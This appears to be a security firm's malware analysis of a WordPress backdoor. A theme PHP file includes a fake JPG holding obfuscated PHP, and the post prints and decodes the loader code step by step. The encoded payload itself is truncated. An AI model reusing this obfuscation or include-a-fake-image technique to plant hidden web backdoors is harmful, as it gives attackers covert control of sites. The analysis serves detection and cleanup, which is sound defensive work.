During an incident response investigation, we detected an interesting backdoor that was hidden in a fake image. The attacker was quite creative in creating an attack that would work in two steps.
The attacker created two files. The first file was a normal looking php file that would include the fake image.
Let’s review the content located in the php file: “./wp-content/themes/twentythirteen/images/3.php”
<?phpinclude("check-db.jpg");?>When looking at the code inside the file: “./wp-content/themes/twentythirteen/images/3.php” we see a strange use of the include function that’s including check-db.jpg but that in itself is not malware.
Let’s go ahead and inspect the image “check-db.jpg”. After trying to open the file in the browser it looked as if the image was corrupt, as nothing was displaying.
We then opened the file in a normal text editor and found the main source of the backdoor.
$_S="7RpdbxvH8d2A/8P6wvhIhJ+iZFsij07hyHFQp3Zip2gr…yATx5A1QePTKD1/kV6K8xfVv";$_A=strrev("esab")."64_".strrev("edoced");$_X=$_A('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkX1MpKSk7');$trd=strrev("taerc")."e_f".strrev("noitcnu");$ctel=$trd('$_S',$_X);$ctel($_S); ?>Let’s work through the malicious code located inside the fake image “./wp-content/themes/twentythirteen/images/check-db.jpg” step by step to see how it works and how it enables the attacker to gain access to your website files.
First, the variable $_S contains all the malicious code and that will create the backdoor the attacker will use to gain access to your website.
$_S="7RpdbxvH8d2A/8P6wvhIhJ+iZFsij07hyHFQp3Zip2gr…yATx5A1QePTKD1/kV6K8xfVv";
The variable $_A contains the function base64_decode once it has been reversed by the strrev function. $_A before it’s been reversed by the strrev function
$_A=strrev("esab")."64_".strrev("edoced");$_A after it’s been reversed by the strrev function$_A = “base64_decode”;
The next step is where the hacker calls a base64_encoded string that will be decoded by the base64_decode function assigned to the $_A variable.
The $_X variable will be decoded by the function “base64_decode” and once complete it will contain the necessary code to execute and create the backdoor for the attacker.
$_X before it’s decoded by the “base64_decode” function
$_X = $_A('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkX1MpKSk7');$_X after it’s been decoded by the “base64_decode” function
$_X = base64_decode(eval(gzinflate(base64_decode($_S))));
The variable $trd contains the function create_function but it needs to be reversed in order to be used.$trd before it’s been reversed by the strrev function
$trd=strrev("taerc")."e_f".strrev("noitcnu");$trd after it’s been reversed by the strrev function
$trd = “create_function”;$ctel$trd=“create_function”;$ctel=$trd('7Rpdb...',base64_decode(eval(gzinflate(base64_decode($_S)))););$ctel($_S);Now the following variables $trd & $ctel will combine and execute all the functions to give the attacker full access to your website files/folders.
If you want to be sure that your website is not infected, or if you need help cleaning it up, let us know.
Cesar Anjos
Luke Leal
Brian Bautista
Yuliyan Tsvetkov
Denis Sinegubko
Ben Martin
Mohit Jawanjal
John Castro
Stephen Johnston
Rianna MacLeod